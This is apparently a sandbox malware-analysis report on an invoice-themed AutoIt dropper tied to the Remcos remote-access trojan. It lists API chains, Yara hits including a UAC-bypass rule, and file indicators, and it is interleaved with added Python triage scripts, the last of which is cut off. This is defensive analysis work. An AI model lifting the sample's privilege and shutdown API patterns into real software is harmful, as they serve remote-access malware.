                    Source: turbinals.exe, string found in binary or memory: This is a third-party compiled AutoIt script.
                    Source: turbinals.exe, the same marker and runtime string table found in each of the following dumps:
                    00000002.00000002.1311968489.0000000000D94000.00000040.00000001.01000000.00000004.sdmp
                    00000003.00000002.3756168869.0000000000D94000.00000040.00000001.01000000.00000004.sdmp
                    00000009.00000002.1436715774.0000000000D94000.00000040.00000001.01000000.00000004.sdmp
                    0000000A.00000002.1447345247.0000000000D94000.00000040.00000001.01000000.00000004.sdmp
                    0000000B.00000002.1457239744.0000000000D94000.00000040.00000001.01000000.00000004.sdmp
                    0000000D.00000002.1464688620.0000000000D94000.00000040.00000001.01000000.00000004.sdmp
                    AutoIt3 runtime string table (identical in every dump above; adjacent strings are shown run together, as in the report):
                    SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`
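The AutoIt verdict above rests on literal strings the runtime leaves in every compiled script, and the report's other file-level indicators (the Remcos log path and the WScript.Shell CLSID) are literals too. The scanner below is an added example written for this page, not Joe Sandbox code and not part of the sample: it searches a file or raw memory dump for those literals in both ASCII and UTF-16LE. Trying both encodings is an assumption on my part; the report shows the strings but not how they are encoded on disk. The sample dump it runs on is constructed.

```python
"""
Static triage helper: locate the compiled-AutoIt marker and the other literal
indicators this report lists inside a file or raw memory dump.

Added example for this report; not Joe Sandbox code and not part of the sample.
Indicator text comes from the report above; scanning both ASCII and UTF-16LE is
an assumption (the report does not state the on-disk encoding).
"""
from __future__ import annotations

import re
import sys
from dataclasses import dataclass
from pathlib import Path

# Literal indicators taken from this report.
INDICATORS = {
    "autoit_marker": "This is a third-party compiled AutoIt script.",
    "autoit_gui_class": "AutoIt3GUIContainer",
    "remcos_log_path": r"C:\ProgramData\remcos\logs.dat",
    "wscript_shell_clsid": "{72C24DD5-D70A-438B-8A42-98424B88AFB8}",
}


@dataclass(frozen=True)
class Hit:
    name: str
    encoding: str  # "ascii" or "utf-16le"
    offset: int    # byte offset of the match in the scanned data


def _compile_patterns():
    # re.escape on the encoded bytes keeps the backslashes in the path literal.
    # Case is deliberately exact: the runtime marker is fixed-case text.
    return [
        (name, enc, re.compile(re.escape(text.encode(enc))))
        for name, text in INDICATORS.items()
        for enc in ("ascii", "utf-16le")
    ]


_PATTERNS = _compile_patterns()


def find_indicators(data: bytes) -> list[Hit]:
    """Return every indicator occurrence in `data`, ordered by offset."""
    hits = [
        Hit(name, enc, m.start())
        for name, enc, rx in _PATTERNS
        for m in rx.finditer(data)
    ]
    return sorted(hits, key=lambda h: (h.offset, h.name))


def is_compiled_autoit(data: bytes) -> bool:
    """True if the AutoIt runtime marker is present in either encoding."""
    return any(h.name == "autoit_marker" for h in find_indicators(data))


def scan_file(path: str) -> list[Hit]:
    """Scan a whole file; PE images and process dumps fit in memory for triage."""
    return find_indicators(Path(path).read_bytes())


# Constructed test input (not a real dump): padding, the marker as UTF-16LE,
# a gap, then the Remcos log path as ASCII.
SAMPLE_DUMP = (
    b"\x00" * 16
    + INDICATORS["autoit_marker"].encode("utf-16le")
    + b"\x90" * 8
    + INDICATORS["remcos_log_path"].encode("ascii")
    + b"\x00" * 4
)


if __name__ == "__main__":
    targets = sys.argv[1:]
    if not targets:
        for h in find_indicators(SAMPLE_DUMP):
            print(f"constructed sample  {h.offset:#010x}  {h.encoding:<8}  {h.name}")
    for target in targets:
        for h in scan_file(target):
            print(f"{target}  {h.offset:#010x}  {h.encoding:<8}  {h.name}")
```

Run it with no arguments to see the constructed sample, or pass file paths (the submitted executable, the dropped turbinals.exe, or a raw .sdmp) to get offsets you can jump to in a hex editor. A marker hit alone says "compiled AutoIt", not "malicious"; the Remcos path and CLSID hits are what tie a dump to this campaign.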
                    Source: C:\Windows\System32\wscript.exe, COM object queried: Windows Script Host Shell Object, HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe, process stats: CPU usage > 49%
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe, code function 0_2_00ED3633: NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe, code function 0_2_00F5C1AC: PostMessageW,GetFocus,GetDlgCtrlID,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe, code function 0_2_00F5C498: GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe, code function 0_2_00F5C5FE: DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe, code function 0_2_00F5C57D: SendMessageW,NtdllDialogWndProc_W
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe, code function 0_2_00F5C8BE: NtdllDialogWndProc_W
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe, code function 0_2_00F5C88F: NtdllDialogWndProc_W
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe, code function 0_2_00F5C860: NtdllDialogWndProc_W
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe, code function 0_2_00F5C93E: ClientToScreen,NtdllDialogWndProc_W
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe, code function 0_2_00F5C909: NtdllDialogWndProc_W
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe, code function 0_2_00F5CABC: NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe, code function 0_2_00F5CA7C: GetWindowLongW,NtdllDialogWndProc_W
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe, code function 0_2_00ED1287: NtdllDialogWndProc_W,GetSysColor,SetBkColor,74D2C8D0,NtdllDialogWndProc_W
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe, code function 0_2_00ED1290: NtdllDialogWndProc_W,GetClientRect,GetCursorPos,ScreenToClient
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe, code function 0_2_00F5D3B8: NtdllDialogWndProc_W
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe, code function 0_2_00F5D43E: GetSystemMetrics,GetSystemMetrics,MoveWindow,SendMessageW,SendMessageW,ShowWindow,InvalidateRect,NtdllDialogWndProc_W
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe, code function 0_2_00ED16DE: GetParent,NtdllDialogWndProc_W
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe, code function 0_2_00ED16B5: NtdllDialogWndProc_W
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe, code function 0_2_00ED167D: NtdllDialogWndProc_W
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe, code function 0_2_00F5D78C: NtdllDialogWndProc_W
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe, code function 0_2_00ED189B: NtdllDialogWndProc_W
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe, code function 0_2_00F5BC5D: NtdllDialogWndProc_W,CallWindowProcW
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe, code function 0_2_00F5BF8C: ReleaseCapture,SetWindowTextW,SendMessageW,NtdllDialogWndProc_W
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe, code function 0_2_00F5BF30: NtdllDialogWndProc_W
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe, code function 2_2_00CE3633: NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe, code function 2_2_00D6C1AC: PostMessageW,GetFocus,GetDlgCtrlID,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe, code function 2_2_00D6C498: GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe, code function 2_2_00D6C5FE: DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe, code function 2_2_00D6C57D: SendMessageW,NtdllDialogWndProc_W
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe, code function 2_2_00D6C88F: NtdllDialogWndProc_W
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe, code function 2_2_00D6C8BE: NtdllDialogWndProc_W
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe, code function 2_2_00D6C860: NtdllDialogWndProc_W
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe, code function 2_2_00D6C909: NtdllDialogWndProc_W
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe, code function 2_2_00D6C93E: ClientToScreen,NtdllDialogWndProc_W
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe, code function 2_2_00D6CABC: NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe, code function 2_2_00D6CA7C: GetWindowLongW,NtdllDialogWndProc_W
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe, code function 2_2_00CE1287: NtdllDialogWndProc_W,GetSysColor,SetBkColor,74D2C8D0,NtdllDialogWndProc_W
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe, code function 2_2_00CE1290: NtdllDialogWndProc_W,GetClientRect,GetCursorPos,ScreenToClient
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe, code function 2_2_00D6D3B8: NtdllDialogWndProc_W
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe, code function 2_2_00D6D43E: GetSystemMetrics,GetSystemMetrics,MoveWindow,SendMessageW,SendMessageW,ShowWindow,InvalidateRect,NtdllDialogWndProc_W
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe, code function 2_2_00CE16DE: GetParent,NtdllDialogWndProc_W
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe, code function 2_2_00CE16B5: NtdllDialogWndProc_W
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe, code function 2_2_00CE167D: NtdllDialogWndProc_W
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe, code function 2_2_00D6D78C: NtdllDialogWndProc_W
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe, code function 2_2_00CE189B: NtdllDialogWndProc_W
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe, code function 2_2_00D6BC5D: NtdllDialogWndProc_W,CallWindowProcW
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe, code function 2_2_00D6BF8C: ReleaseCapture,SetWindowTextW,SendMessageW,NtdllDialogWndProc_W
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe, code function 2_2_00D6BF30: NtdllDialogWndProc_W
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe, code function 0_2_00F3A1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe, code function 0_2_00F285B0: GetCurrentProcess,OpenProcessToken,CloseHandle,CreateProcessWithLogonW
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe, code function 0_2_00F351BD: ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe, code function 2_2_00D451BD: ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
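Two things are worth pulling out of the "Code function" lines above rather than reading them one by one. First, a handful of API chains matter for triage (token access plus CreateProcessWithLogonW, the shutdown trio, DeviceIoControl, clipboard registration) while most of the rest is AutoIt GUI plumbing. Second, the function list for the submitted sample (process 0) and for the dropped turbinals.exe (process 2) is the same chain for chain, with every address exactly 0x1F0000 lower in process 2, which is what you expect when the same image is loaded at a different base. The helper below is an added example written for this page, not Joe Sandbox tooling: it parses the raw report lines as they appear after extraction (trailing duplicated function id included), tags functions against a small watchlist that is this example's own choice, and computes the base delta between two processes. The input lines are copied from this report and labelled as constructed input.

```python
"""
Triage helper for the "Code function" lines of a Joe Sandbox report: parse the
raw lines, tag functions whose API chain touches something an analyst cares
about, and test whether two processes carry the same image at different bases.

Added example for this report, not Joe Sandbox's own tooling. The line shape
("...exeCode function: <pid>_<run>_<addr> API,API,...,<pid>_<run>_<addr>") is
what the report shows after extraction; the watchlist is this example's choice.
"""
from __future__ import annotations

import re
from collections import Counter
from dataclasses import dataclass

LINE_RX = re.compile(
    r"Source:\s*(?P<src>.*?)\s*Code function:\s*"
    r"(?P<fn>\d+_\d+_[0-9A-Fa-f]{8}):?\s*"
    r"(?P<apis>.*?),?\s*(?P=fn)?\s*$"   # trailing repeat of the id is optional
)

# Watchlist for this example: API name -> behaviour it hints at.
WATCHLIST = {
    "OpenProcessToken": "token access",
    "CreateProcessWithLogonW": "run-as / credential use",
    "ExitWindowsEx": "shutdown or reboot",
    "InitiateSystemShutdownExW": "shutdown or reboot",
    "SetSystemPowerState": "shutdown or reboot",
    "DeviceIoControl": "raw device I/O",
    "RegisterClipboardFormatW": "clipboard access",
    "GetKeyState": "keyboard state polling",
}


@dataclass(frozen=True)
class CodeFunction:
    source: str       # process image the function was found in
    process_id: int   # Joe Sandbox process index (first field of the id)
    address: int      # virtual address (third field of the id)
    apis: tuple       # API names in call order; empty if none were listed


def parse_code_function_lines(lines) -> list[CodeFunction]:
    funcs = []
    for line in lines:
        m = LINE_RX.search(line)
        if not m:
            continue
        pid, _run, addr = m.group("fn").split("_")
        apis = tuple(a for a in m.group("apis").split(",") if a)
        funcs.append(CodeFunction(m.group("src"), int(pid), int(addr, 16), apis))
    return funcs


def tag_functions(funcs) -> dict:
    """Map (process_id, address) -> sorted behaviour tags; untagged functions are omitted."""
    tags = {}
    for f in funcs:
        hit = sorted({WATCHLIST[a] for a in f.apis if a in WATCHLIST})
        if hit:
            tags[(f.process_id, f.address)] = hit
    return tags


def same_image_delta(funcs, pid_a, pid_b):
    """
    If pid_b runs the code of pid_a at another base, each function of A reappears
    in B at address + delta with the same API chain. Returns (delta, matched,
    total) for the most common delta, or None if the chains never line up.
    """
    a = [f for f in funcs if f.process_id == pid_a]
    b_by_sig: dict = {}
    for f in funcs:
        if f.process_id == pid_b:
            b_by_sig.setdefault(f.apis, []).append(f.address)
    deltas = Counter(addr_b - f.address for f in a for addr_b in b_by_sig.get(f.apis, []))
    if not deltas:
        return None
    delta = deltas.most_common(1)[0][0]
    b_set = {(f.address, f.apis) for f in funcs if f.process_id == pid_b}
    matched = sum((f.address + delta, f.apis) in b_set for f in a)
    return delta, matched, len(a)


# Constructed input: raw lines copied from this report before any cleanup.
SAMPLE_LINES = [
    r"Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeCode function: 0_2_00ED3633 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow,0_2_00ED3633",
    r"Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeCode function: 0_2_00F5C498 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W,0_2_00F5C498",
    r"Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeCode function: 0_2_00F285B0 GetCurrentProcess,OpenProcessToken,CloseHandle,CreateProcessWithLogonW,0_2_00F285B0",
    r"Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeCode function: 0_2_00F351BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_00F351BD",
    r"Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeCode function: 0_2_00EFD9750_2_00EFD975",
    r"Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeCode function: 2_2_00CE3633 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow,2_2_00CE3633",
    r"Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeCode function: 2_2_00D6C498 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W,2_2_00D6C498",
    r"Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeCode function: 2_2_00D451BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,2_2_00D451BD",
    r"Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeCode function: 2_2_00D0D9752_2_00D0D975",
]

if __name__ == "__main__":
    parsed = parse_code_function_lines(SAMPLE_LINES)
    for (pid, addr), t in sorted(tag_functions(parsed).items()):
        print(f"process {pid} {addr:#010x}: {', '.join(t)}")
    print("base delta process 0 -> 2:", same_image_delta(parsed, 0, 2))
```

Feed it the full report (every "Code function" line, not just the nine copied here) and the delta result tells you how many of the sample's functions were found at a constant offset in the dropped copy; a near-total match is strong evidence that turbinals.exe is the submitted file relocated, so any further analysis only needs to be done once.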
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe, code function 0_2_00EFD975
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe, code function 0_2_00EDFCE0
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe, code function 0_2_00EF21C5
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe, code function 0_2_00F062D2
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe, code function 0_2_00F503DA
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe, code function 0_2_00F0242E
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe, code function 0_2_00EF25FA
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe, code function 0_2_00EE66E1
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe, code function 0_2_00EDE6A0
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe, code function 0_2_00F2E616
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe, code function 0_2_00F0878F
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe, code function 0_2_00F38889
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe, code function 0_2_00F50857
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe, code function 0_2_00F06844
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe, code function 0_2_00EE8808
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe, code function 0_2_00EFCB21
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe, code function 0_2_00F06DB6
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe, code function 0_2_00EE6F9E
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe, code function 0_2_00EE3030
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe, code function 0_2_00EFF1D9
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe, code function 0_2_00EF3187
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe, code function 0_2_00ED1287
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe, code function 0_2_00EF1484
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe, code function 0_2_00EE5520
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe, code function 0_2_00EF7696
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe, code function 0_2_00EE5760
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe, code function 0_2_00EF1978
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe, code function 0_2_00F09AB5
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe, code function 0_2_00F57DDB
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe, code function 0_2_00EFBDA6
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe, code function 0_2_00EF1D90
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe, code function 0_2_00EE3FE0
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe, code function 0_2_00EDDF00
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe, code function 0_2_011704C8
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe, Code function: 2_2_00D0D975
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe, Code function: 2_2_00CEFCE0
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe, Code function: 2_2_00D021C5
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe, Code function: 2_2_00D162D2
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe, Code function: 2_2_00D603DA
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe, Code function: 2_2_00D1242E
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe, Code function: 2_2_00D025FA
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe, Code function: 2_2_00CF66E1
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe, Code function: 2_2_00CEE6A0
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe, Code function: 2_2_00D3E616
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe, Code function: 2_2_00D1878F
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe, Code function: 2_2_00D48889
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe, Code function: 2_2_00D60857
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe, Code function: 2_2_00D16844
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe, Code function: 2_2_00CF8808
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe, Code function: 2_2_00D0CB21
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe, Code function: 2_2_00D16DB6
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe, Code function: 2_2_00CF6F9E
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe, Code function: 2_2_00CF3030
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe, Code function: 2_2_00D0F1D9
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe, Code function: 2_2_00D03187
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe, Code function: 2_2_00CE1287
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe, Code function: 2_2_00D01484
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe, Code function: 2_2_00CF5520
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe, Code function: 2_2_00D07696
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe, Code function: 2_2_00CF5760
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe, Code function: 2_2_00D01978
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe, Code function: 2_2_00D19AB5
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe, Code function: 2_2_00D67DDB
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe, Code function: 2_2_00D01D90
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe, Code function: 2_2_00D0BDA6
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe, Code function: 2_2_00CF3FE0
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe, Code function: 2_2_00CEDF00
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe, Code function: 2_2_00FF3438
Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe, Code function: String function: 00EF0AE3 appears 70 times
Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe, Code function: String function: 00ED7DE1 appears 35 times
Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe, Code function: String function: 00EF8900 appears 42 times
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe, Code function: String function: 00CE7DE1 appears 35 times
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe, Code function: String function: 00D08900 appears 42 times
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe, Code function: String function: 00D00AE3 appears 70 times
Source: z49FACTURA-0987678.exe, Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
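Added example, not part of the Joe Sandbox report or its tooling: a short Python script that parses rows in the shape of this report, groups the "Code function" addresses by process number, and checks whether two processes expose the same function layout at a constant offset. In this report, process 0 (z49FACTURA-0987678.exe) and process 2 (turbinals.exe) list functions that differ by exactly 0x1F0000 (00F0878F vs 00D1878F, 00F38889 vs 00D48889, 00EE8808 vs 00CF8808; the "String function" rows show the same shift, 00EF0AE3 vs 00D00AE3), which is what the same image loaded at a different base looks like, i.e. the dropped turbinals.exe is running the same code as the submitted sample. The script also collapses the "Matched rule" rows (raw.unpack, unpack and sdmp views of one process) into the set of processes each Yara rule fired in. The sample rows are a constructed, abbreviated subset of this report's rows; reading the leading number of a source name as the process number, and the 8-hex-digit prefix of an .sdmp name as that number in hex, are assumptions about Joe Sandbox's naming scheme.

```python
"""Group Joe Sandbox 'Code function' and 'Matched rule' rows by process and
look for a constant relocation offset between two processes.
Added example; not Joe Sandbox code. Only as robust as the row shapes shown."""
import re
from collections import Counter, defaultdict

# Constructed sample rows (abbreviated subset of this report). One row is left
# fused ("exeCode function") the way the HTML-to-text extraction renders it,
# and the Yara metadata is cut to "..." since only the rule name is parsed.
SAMPLE_ROWS = r"""
Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe Code function: 0_2_00F0878F
Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe Code function: 0_2_00F38889
Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe Code function: 0_2_00EE8808
Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeCode function: 0_2_011704C8
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe Code function: 2_2_00D1878F
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe Code function: 2_2_00D48889
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe Code function: 2_2_00CF8808
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe Code function: 2_2_00FF3438
Source: 13.2.turbinals.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = ...
Source: 13.2.turbinals.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = ...
Source: 13.2.turbinals.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = ...
Source: 10.2.turbinals.exe.ec0000.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ...
Source: 0000000A.00000002.1447676377.0000000000EC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = ...
Source: 0000000D.00000002.1464360222.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Description = ...
"""

# Both regexes tolerate the fused form (no whitespace between table cells).
# Assumption: the ID is <process number>_<dump number>_<address>.
CODE_RE = re.compile(
    r"Source:\s*(?P<src>.+?)\s*Code function:\s*"
    r"(?P<pid>\d+)_(?P<dump>\d+)_(?P<addr>[0-9A-Fa-f]{8})")
YARA_RE = re.compile(
    r"Source:\s*(?P<src>\S+?),\s*type:\s*(?P<kind>UNPACKEDPE|MEMORY)\s*"
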